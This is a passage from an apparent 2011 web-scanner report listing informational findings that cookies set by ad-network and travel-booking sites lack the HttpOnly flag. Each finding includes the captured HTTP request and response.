P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5997
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:49:28 GMT
Connection: close
Set-Cookie: 538936_3_106934_1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: FC1-WC=59764_2_3KjzP; Domain=.contextweb.com; Expires=Wed, 02-Oct-2041 19:49:28 GMT; Path=/
Set-Cookie: CDSActionTracking6=ENufC6tGDSs5|PpAVCxNh2PJr|538936|3448|7061|59764|134043|106934|3|345|25|premierleague.com|2|8|1|0|2|1|2|EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1|1|1|-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^|I|3JX6w|3UPoY; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 19:49:27 GMT; Path=/
Set-Cookie: vf=2; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0D%0Afunction%20pr_swfver%28%29%7B%0D%0Avar%20osf%2Cosfd%2Ci%2Caxo%3D1%2Cv%3D0%2Cnv%3Dnavigator%3B%0D%0Aif%28nv.plugins
...[SNIP]...

14.216. http://tap.rubiconproject.com/oz/feeds/targus/profile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/feeds/targus/profile

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/targus/profile?p=targus&oz_source=partner&segment=000&zip=&dob=&gender=&pc= HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7845/12566
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; dq=5|5|0|0; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk2=0; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; rdk=7845/12566; rdk15=0; ses15=13378^2&13209^2&12566^1; csi15=3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 204 No Content
Date: Sun, 02 Oct 2011 23:51:41 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Mon, 01-Oct-2012 23:51:41 GMT; Path=/
Set-Cookie: dq=7|7|0|0; Expires=Mon, 01-Oct-2012 23:51:41 GMT; Path=/
Set-Cookie: lm="2 Oct 2011 23:51:41 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

14.217. http://tap.rubiconproject.com/oz/sensor

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/sensor?p=rubicon&pc=7743/12359&cd=false&xt=16&k=pm+bst:248,norwich+city:192,7+11:160,10+7:160,unbeaten+run:144,keep+unbeaten:144,manchester+united:144,will+keep:144,confident+manchester:144,anderson+confident:144,run+going:144,united+will:144,football+news:128,news:94,city+goal:80,champions+league:80,watch:76,will+give:64,table+results:64,football+new:64,45+pm:64,00+pm:64,7+45:64,old+trafford:64,15+00:64,match+kicks:64,trafford+crowd:64,newly+promoted:64,crowd+will:64,midfielder+believes:64,brazilian+midfielder:64,promoted+club:64,goal:60,football:60,europa+league:56,30+pm:56,manchester:52,united:52,norwich:50,15+pm:48,&t=Anderson+confident+Manchester+United+will+keep+unbeaten+run+going+against+Norwich+City+-+Goal.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=6|6|0|0; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; rdk=7743/12359; ses15=13378^2&13209^3&12566^2&12359^2

Response

HTTP/1.1 204 No Content
Date: Mon, 03 Oct 2011 00:01:01 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 02-Oct-2012 00:01:01 GMT; Path=/
Set-Cookie: dq=8|6|2|0; Expires=Tue, 02-Oct-2012 00:01:01 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

14.218. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /partner/agent/rubicon/channels.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoaded&pc=7743/12359 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=6|6|0|0; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; rdk=7743/12359; ses15=13378^2&13209^3&12566^2&12359^2

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:07 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 941
Cache-control: private
Set-Cookie: khaos=GT3FYRAA-6-CO8F; Domain=.rubiconproject.com; Expires=Tue, 01-Oct-2019 00:01:07 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close


var oo_profile={
tokenType : "0",
tracking : "",
tags : "Sports and Recreation,Hobbies and Interests,Education,Toys and Games,Family and Parenting,Democrats",
tagcloud : [
{ tag: "Spo
...[SNIP]...

14.219. http://travel.travelocity.com/hotel/HotelAvailability.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelAvailability.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city& HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; mbox=check#true#1317600585|session#1317600481056-80236#1317602385|PC#1317600481056-80236.19#1318810125

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSID=50C7F54C8E08272A256D4F9FCD45DA82.p0611; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Set-Cookie: JSESSIONID=; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSID=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SID=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ex.lb.entity=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lb.entity=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Location: http://travel.travelocity.com/hotel/HotelAvailability.do?.stc=50C7F54C8E08272A256D4F9FCD45DA82.p0611&dateFormat=mm/dd/yyyy&Service=TRAVELOCITY&cityCountryCode=US&city=bos&returningDate=mm/dd/yyyy&leavingDate=mm/dd/yyyy&searchMode=city&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

14.220. http://travel.travelocity.com/hotel/HotelCobrand.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelCobrand.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /hotel/HotelCobrand.do HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
Content-Length: 735
Cache-Control: max-age=0
Origin: http://www.travelocity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Service=TRAVELOCITY&SEQ=60048504&searchMode=city&expr_path=Y&dateFormat=mm%2Fdd%2Fyyyy&opaqueTabSelected=0&cityCountryCode=US&city=bos&state=&TS_HO_destlist=Las+Vegas%7CNV%7CUS&leavingDate=mm%2Fdd%2Fy
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:46 GMT
Server: Apache
Set-Cookie: JSID=AE7752E570B0CD85432B0A6ABF76028D.p0856; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 3616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--
JSESSIONID = AE7752E570B0CD85432B0A6ABF76028D.p0856
TPSESSIONID = null
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script
...[SNIP]...

14.221. http://travel.travelocity.com/hotel/HotelDetail.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelDetail.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:34 GMT
Server: Apache
Set-Cookie: JSID=A7716E473BF556C6BB6CA1860CF34A22.p0717; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 113893

<!--
JSESSIONID = A7716E473BF556C6BB6CA1860CF34A22.p0717
TPSESSIONID = T0075003076751026003112815903110013629
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script type="text/javascript">var j
...[SNIP]...

14.222. http://travel.travelocity.com/pub/gwt/hotel/esf/NoCacheAction.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /pub/gwt/hotel/esf/NoCacheAction.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pub/gwt/hotel/esf/NoCacheAction.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617&service=TRAVELOCITY HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; mbox=check#true#1317600585|session#1317600481056-80236#1317602385|PC#1317600481056-80236.19#1318810125; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSID=4624190710EDB02407F82A5D5E671CC4.p0739; Domain=.travelocity.com; Path=/
ETag: W/"4888-1316720620000"
Last-Modified: Thu, 22 Sep 2011 19:43:40 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 4888

function esf(){var M='',nb='" for "gwt:onLoadErrorFn"',lb='" for "gwt:onPropertyErrorFn"',Y='"><\/script>',$='#',Lb='.cache.html?jsessionid='+jsessionid,ab='/',Fb='226C4CC2E5A5A4FBE9703DC949A8A7C5',Gb
...[SNIP]...

14.223. http://travela.priceline.com/sharedapps/scs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /sharedapps/scs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sharedapps/scs?val=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3&ts=1317600634270 HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:58 GMT
Server: Apache
Set-Cookie: SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; Domain=.priceline.com; Expires=Thu, 01-Dec-2011 04:59:59 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.224. http://u.openx.net/w/1.0/sc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://u.openx.net
Path:   /w/1.0/sc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/1.0/sc?r=http%3A%2F%2Fpsa-d.openx.com%2Fw%2F1.0%2Fajs%3Fauid%3D34591%26res%3D1920x1200x16%26plg%3Dswf%2Csl%2Cqt%2Cwmp%2Cshk%26ch%3DISO-8859-1%26tz%3D300%26r%3Dhttp%253A%2F%2Fad.yieldmanager.com%2Fclk%253F3%252CeAGljN9ugjAUxp-GO9L0n1hDdlHWmRCtmwkbwRuDbR2KUKwsEp9-zTC8wE5Ozvl9J9.5EIlNSYlmlEREQ4YPixgRrOZQzZhiIYzjmEA8R5hG4S1NNBcIpjxZra5b.ldiIVYj-SkY3xaj-mAc3AUA1Dp5H09XyeBk.RckFiXpM8Hv7xFrpOTwSJMpWhToPf-EEm8u6.yr3mRvvcyWF.kK6e68RetM0V2ma5kXqDjXcDM98pcwrPq-CwgP8NK3Br0rtRmA7Uw7AGUbfyyPDnSVNy2dOTpzqwIiKAxw9LCtOWmvohlCXquD51N7M67fu7LVttm3P83BuH1lnPGGi1Xe8QtnK3Hf%252C%26url%3Dhttp%253A%2F%2Fad.yieldmanager.com%2Fiframe3%253FsIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABWlIC2a93RChYjAkZYQYlvVHyaUTyyLANlDidrAAAAAA%253D%253D%252C%252Chttp%25253A%25252F%25252Fd.tradex.openx.com%25252Fafr.php%25253Frefresh%25253D40%252526zoneid%25253D6511%252526cb%25253Dinsert_random_number_here%252526loc%25253D%252CB%25253D10%252526Z%25253D728x90%252526_salt%25253D31903434%252526r%25253D0%252526s%25253D2126909%252C659e43ce-ed51-11e0-8f45-78e7d1f5b944%252C1317599467411%26ref%3Dhttp%253A%2F%2Fad.yieldmanager.com%2Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D2126909%26cb%3D53152720326%26cc%3D1 